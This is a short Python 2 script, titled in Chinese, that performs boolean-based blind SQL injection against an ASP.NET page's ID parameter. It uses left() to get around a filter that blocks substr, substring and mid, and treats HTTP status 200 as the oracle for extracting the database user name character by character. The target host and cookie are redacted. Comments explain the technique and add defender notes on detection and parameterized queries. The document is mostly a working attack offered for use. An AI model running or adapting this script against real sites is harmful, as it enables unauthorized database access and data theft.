禁用substr、substring、mid函数的sql注入脚本

# coding=utf-8
import requests
import sys
  
reload(sys)  # Python 2 idiom: re-expose setdefaultencoding, which site.py removes at startup
sys.setdefaultencoding('utf-8')
# Candidate characters, tried one position at a time. The set is limited to
# [A-Za-z0-9@_.]; any character outside it is never matched.
payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')

# Static browser-like request headers. The Cookie value is redacted on the page
# (asterisks); presumably a valid session cookie is expected there.
headers = {
    'Cache-Control':'max-age=0','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Upgrade-Insecure-Requests':'1','User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36','Accept-Encoding':'gzip, deflate, sdch','Accept-Language':'zh-CN,zh;q=0.8','Cookie':'*****************************************'
    }

print "test..."  # Python 2 print statement; this file does not run under Python 3

# Boolean-based blind SQL injection that reconstructs the database user name one
# character per round. The probe uses left() instead of substr/substring/mid (the
# title says those are blocked) and uses "HTTP status == 200" as the true/false oracle.
#
# From a defender's view the traffic pattern is distinctive: a burst of requests to
# the same ID= parameter whose query string contains "case when (left(user," with a
# length that only increments once per accepted prefix, each ending in "--". Parameterized
# queries remove the injection point; returning the same status code for SQL errors and
# normal responses removes the oracle this loop depends on.
user=""
for i in range(1,7):  # positions 1..6 only; a longer name is never fully recovered
    for payload in payloads:
        user+=payload  # tentatively append the next candidate character
        aaa="--"  # SQL line comment that discards the rest of the original query
        d="(case when (left(user,%s))='%s' then 1 else 0 end)" % (i,user)
        test = d + aaa
        # The probe is concatenated raw into the query string (spaces and quotes are not
        # URL-encoded) after the ID value; the host and page name are redacted on the page.
        r=requests.get('http://**********/******.aspx?ID=203263/'+test,headers=headers)
        if r.status_code==200:
            print user  # prefix accepted by the oracle; keep it and advance to position i+1
            break
        else:
            user=user[:-1]  # prefix rejected; drop the candidate character and try the next

  
